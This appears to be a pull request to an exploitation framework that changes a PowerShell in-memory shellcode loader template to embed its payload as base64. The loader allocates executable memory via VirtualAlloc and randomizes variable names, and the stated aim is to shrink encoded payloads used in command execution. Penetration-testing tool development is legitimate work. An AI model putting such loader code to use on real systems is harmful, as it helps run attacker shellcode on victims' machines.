### PR TITLE
Use base64 to reduce  psh-net payload size

### DIFF
--- a/data/templates/scripts/to_mem_dotnet.ps1.template
+++ b/data/templates/scripts/to_mem_dotnet.ps1.template
@@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
 $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
 
-%{shellcode}
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 
 $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -910,7 +910,7 @@ def self.to_vba(framework,code,opts={})
     hash_sub[:var_compileParams] 	= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
 
     return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end


### PR DESCRIPTION
Significant change in filesize:

Before:
3,755 m.ps1
After:
2,251 m.ps1

As we are often using this file encoded during command execution smaller is better! 
